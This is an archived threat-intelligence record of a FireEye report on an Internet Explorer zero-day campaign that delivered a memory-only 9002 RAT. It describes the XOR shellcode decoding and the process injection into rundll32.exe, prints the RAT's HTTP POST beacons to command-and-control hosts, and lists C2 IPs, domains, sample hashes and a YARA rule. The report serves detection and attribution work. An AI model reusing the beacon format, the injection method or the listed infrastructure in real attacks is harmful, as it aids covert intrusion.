{
	"id": "53f4e7f0-c3f5-4f37-b230-63671fa1d81e",
	"created_at": "2026-04-06T00:13:58.9921Z",
	"updated_at": "2026-04-10T03:37:58.741126Z",
	"deleted_at": null,
	"sha1_hash": "8bec79106c1efb07cad4dfe4cd92a2748e8c7fc1",
	"title": "Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method « Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 748660,
	"plain_text": "Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method\r\nBy Ned Moran, Sai Omkar Vashisht, Mike Scott, Thoufique Haq\r\nPublished: 2013-11-10 · Archived: 2026-04-05 19:58:58 UTC\r\nRecently, we discovered a new IE zero-day exploit in the wild, which has been used in a strategic Web compromise. Specifically, the attackers inserted this zero-day exploit into a strategically important website, known to draw visitors that are likely interested in national and international security policy. We have identified relationships between the infrastructure used in this attack and that used in Operation DeputyDog. Furthermore, the attackers loaded the payload used in this attack directly into memory without first writing to disk – a technique not typically used by advanced persistent threat (APT) actors. This technique will further complicate network defenders’ ability to triage compromised systems using traditional forensics methods.\r\nEnter Trojan.APT.9002\r\nOn November 8, 2013 our colleagues Xiaobo Chen and Dan Caselden posted about a new Internet Explorer 0-day exploit seen in the wild. This exploit was seen used in a strategic Web compromise. The exploit chain was limited to one website. There were no iframes or redirects to external sites to pull down the shellcode payload.\r\nThrough the FireEye Dynamic Threat Intelligence (DTI) cloud, we were able to retrieve the payload dropped in the attack. This payload has been identified as a variant of Trojan.APT.9002 (aka Hydraq/McRAT variant) and runs in memory only. It does not write itself to disk, leaving little to no artifacts that can be used to identify infected endpoints.\r\nSpecifically, the payload is shellcode, which is decoded and directly injected into memory after successful exploitation via a series of steps. After an initial XOR decoding of the payload with the key \"0x9F\", an instance of rundll32.exe is launched and injected with the payload using CreateProcessA, OpenProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.\r\nhttps://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html\r\nPage 1 of 9\r\nFigure 1 - Initial XOR decoding of shellcode, with key '0x9F'\r\nFigure 2 - Shellcode launches rundll32.exe and injects payload\r\nAfter transfer of control to the injected payload in rundll32.exe, the shellcode is then subjected to two more levels of XOR decoding with the keys '0x01', followed by '0x6A'.\r\nFigure 3 - Decoding shellcode with XOR key '0x01'\r\nFigure 4 - Decoding shellcode with XOR key '0x6A'\r\nProcess execution is then transferred to the final decoded payload, which is a variant of the 9002 RAT.\r\nFigure 5 - Transfer of process execution to final decoded payload\r\nThe fact that the attackers used a non-persistent first stage payload suggests that they are confident in both their resources and skills. As the payload was not persistent, the attackers had to work quickly in order to gain control of victims and move laterally within affected organizations. If the attackers did not immediately seize control of infected endpoints, they risked losing these compromised endpoints, as the endpoints could have been rebooted at any time – thus automatically wiping the in-memory Trojan.APT.9002 malware variant from the infected endpoint.\r\nAlternatively, the use of this non-persistent first stage may suggest that the attackers were confident that their intended targets would simply revisit the compromised website and be re-infected.\r\nCommand and Control Protocol and Infrastructure\r\nThis Trojan.APT.9002 variant connected to a command and control server at 111.68.9.93 over port 443. It uses a non-HTTP protocol as well as an HTTP POST for communicating with the remote server. However, the callback beacons have changed in this version, in comparison to the older 9002 RATs.\r\nThe older traditional version of 9002 RAT had a static 4-byte identifier at offset 0 in the callback network traffic. This identifier was typically the string \"9002\", but we have also seen variants where this has been modified – such as the 9002 variant documented in the Sunshop campaign.\r\nFigure 6 - Traditional 9002 RAT callback beacon\r\nIn contrast, the beacon from the diskless 9002 payload used in the current IE 0-day attack is remarkably different and uses a dynamic 4-byte XOR key to encrypt the data. This 4-byte key is present at offset 0 and changes with each subsequent beacon. FireEye Labs is aware that the 4-byte XOR version of 9002 has been in the wild for a while and is used by multiple APT actors, but this is the first time we’ve seen it deployed in the diskless payload method.\r\nFigure 7 - Sample callback beacons of the diskless 9002 RAT payload\r\nFigure 8 - XOR decrypted callback beacons of the diskless 9002 RAT payload\r\nThe XOR decoded data always contains the static value \"\\x09\\x12\\x11\\x20\" at offset 16. This value is in fact hardcoded in the packet data construction function prior to XOR encoding. This value is most likely the date \"2011-12-09\", but its significance is not known at this time.\r\nFigure 9 - Packet data construction function showing hardcoded value\r\nThe diskless 9002 RAT payload also makes a POST request, which has also changed from the traditional version. It has Base64 stub data instead of the static string \"AA\". The User-Agent string and URI pattern remain the same, however. It uses the static string \"lynx\" in the User-Agent string, and the URI is incremental hexadecimal values.\r\nTraditional 9002 RAT:\r\nPOST /4 HTTP/1.1\r\nUser-Agent: lynx\r\nHost: ieee.boeing-job.com\r\nContent-Length: 2\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nAA\r\nDiskless 9002 RAT:\r\nPOST /2 HTTP/1.1\r\nUser-Agent: lynx\r\nHost: 111.68.9.93:443\r\nContent-Length: 104\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nwUeAKsFHgCrBR4AqwUeAKshVkQrBR4AqwUeAKsFHgCrBR4AqwUeAKsFHgCrBR4AqwUeAKsFHgCrBR4AqwUeAKsFHgCrBR4AqwUeAKg==\r\nThe data in the POST stub is also encrypted with a 4-byte XOR key, and when decrypted, the data is similar to the data in the non-HTTP beacon and also has the static value \"\\x09\\x12\\x11\\x20\".\r\nCampaign Analysis\r\nWe previously observed 104130d666ab3f640255140007f0b12d connecting to the same 111.68.9.93 IP address. Analysis of MD5 104130d666ab3f640255140007f0b12d revealed that it shared unique identifying characteristics with 90a37e54c53ffb78969644b1a7038e8c, acbc249061a6a2fb09271a68d53567d9, and 20854f54b0d03118681410245be39bd8.\r\nMD5 acbc249061a6a2fb09271a68d53567d9 and 90a37e54c53ffb78969644b1a7038e8c are both Trojan.APT.9002 variants and connect to a command and control server at 58.64.143.244.\r\nMD5 20854f54b0d03118681410245be39bd8 is another Trojan.APT.9002 variant. This variant connected to a command and control server at ad04.bounceme.net.\r\nPassive DNS analysis of this domain revealed that it resolved to 58.64.213.104 between 2011-09-23 and 2011-10-21. The following other domains have also been seen resolving to this same IP address:\r\nDomain                First Seen   Last Seen\r\ndll.freshdns.org      2011-12-08   2012-01-31\r\ngrado.selfip.com      2011-12-23   2012-01-10\r\nusc-data.suroot.com   2012-02-20   2012-02-22\r\nusa-mail.scieron.com  2011-12-01   2012-02-22\r\nIf the domain dll.freshdns.org rings a bell, it should. While covering a different Internet Explorer zero-day (CVE-2013-3893) and the associated Operation DeputyDog campaign, we reported that the CnC infrastructure used in that campaign overlapped with this same domain: dll.freshdns.org.\r\nInside the in-memory version of the Trojan.APT.9002 payload used in this strategic Web compromise, we identified the following interesting string: “rat_UnInstall”. Through DTI, we found this same string present in a number of different samples, including the ones discussed above:\r\n104130d666ab3f640255140007f0b12d\r\n90a37e54c53ffb78969644b1a7038e8c\r\nacbc249061a6a2fb09271a68d53567d9\r\n20854f54b0d03118681410245be39bd8\r\nBased on this analysis, all of these samples, including the in-memory variant, can be detected with the following simple YARA signature:\r\nrule FE_APT_9002_rat\r\n{\r\n    meta:\r\n        author = \"FireEye Labs\"\r\n    strings:\r\n        $mz = {4d 5a}\r\n        $a = \"rat_UnInstall\" wide ascii\r\n    condition:\r\n        ($mz at 0) and $a\r\n}\r\nWe also found the following strings of interest present in the above 9002 RAT samples (excluding the in-memory variant):\r\nMcpRoXy.exe\r\nSoundMax.dll\r\nThese strings were all observed and highlighted by Bit9 here. As Bit9 notes in their blog, Trojan.APT.9002 (aka Hydraq/McRAT) was also used in the original Operation Aurora campaign, and the “rat_UnInstall” string can be found in the original Aurora samples, confirming the lineage.\r\nConclusions\r\nBy utilizing strategic Web compromises along with in-memory payload delivery tactics and multiple nested methods of obfuscation, this campaign has proven to be exceptionally accomplished and elusive. APT actors are clearly learning and employing new tactics. With uncanny timing and a penchant for consistently employing zero-day exploits in targeted attacks, we expect APT threat actors to continue to evolve and launch new campaigns for the foreseeable future. Not surprisingly, these old dogs continue to learn new tricks.\r\nFireEye Labs would like to thank iSIGHT Partners for their assistance with this research.\r\nSource: https://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html"
	],
	"report_names": [
		"operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html"
	],
	"threat_actors": [
		{
			"id": "ee39ecf0-d311-49e5-b0ae-3e3d71f71def",
			"created_at": "2025-08-07T02:03:24.626625Z",
			"updated_at": "2026-04-10T02:00:03.605175Z",
			"deleted_at": null,
			"main_name": "BRONZE KEYSTONE",
			"aliases": [
				"APT17 ",
				"Aurora Panda ",
				"DeputyDog ",
				"Group 72 ",
				"Hidden Lynx ",
				"TG-8153 ",
				"Tailgater Team"
			],
			"source_name": "Secureworks:BRONZE KEYSTONE",
			"tools": [
				"9002",
				"BlackCoffee",
				"DeputyDog",
				"Derusbi",
				"Gh0stHTTPSDropper",
				"HiKit",
				"InternalCMD",
				"PlugX",
				"PoisonIvy",
				"ZxShell"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "86fd71d3-06dc-4b73-b038-cedea7b83bac",
			"created_at": "2022-10-25T16:07:23.330793Z",
			"updated_at": "2026-04-10T02:00:04.545236Z",
			"deleted_at": null,
			"main_name": "APT 17",
			"aliases": [
				"APT 17",
				"ATK 2",
				"Beijing Group",
				"Bronze Keystone",
				"Deputy Dog",
				"Elderwood",
				"Elderwood Gang",
				"G0025",
				"G0066",
				"Operation Aurora",
				"Operation DeputyDog",
				"Operation Ephemeral Hydra",
				"Operation RAT Cook",
				"SIG22",
				"Sneaky Panda",
				"TEMP.Avengers",
				"TG-8153",
				"Tailgater Team"
			],
			"source_name": "ETDA:APT 17",
			"tools": [
				"9002 RAT",
				"AGENT.ABQMR",
				"AGENT.AQUP.DROPPER",
				"AGENT.BMZA",
				"AGENT.GUNZ",
				"Agent.dhwf",
				"AngryRebel",
				"BlackCoffee",
				"Briba",
				"Chymine",
				"Comfoo",
				"Comfoo RAT",
				"Darkmoon",
				"DeputyDog",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Fexel",
				"Gen:Trojan.Heur.PT",
				"Gh0st RAT",
				"Ghost RAT",
				"Gresim",
				"HOMEUNIX",
				"HiKit",
				"HidraQ",
				"Homux",
				"Hydraq",
				"Jumpall",
				"Kaba",
				"Korplug",
				"Linfo",
				"MCRAT.A",
				"McRAT",
				"MdmBot",
				"Mdmbot.E",
				"Moudour",
				"Mydoor",
				"Naid",
				"Nerex",
				"PCRat",
				"PNGRAT",
				"Pasam",
				"PlugX",
				"Poison Ivy",
				"RedDelta",
				"Roarur",
				"SPIVY",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trojan.Naid",
				"Vasport",
				"Wiarp",
				"Xamtrav",
				"Zox",
				"ZoxPNG",
				"ZoxRPC",
				"gresim",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434438,
	"ts_updated_at": 1775792278,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8bec79106c1efb07cad4dfe4cd92a2748e8c7fc1.pdf",
		"text": "https://archive.orkl.eu/8bec79106c1efb07cad4dfe4cd92a2748e8c7fc1.txt",
		"img": "https://archive.orkl.eu/8bec79106c1efb07cad4dfe4cd92a2748e8c7fc1.jpg"
	}
}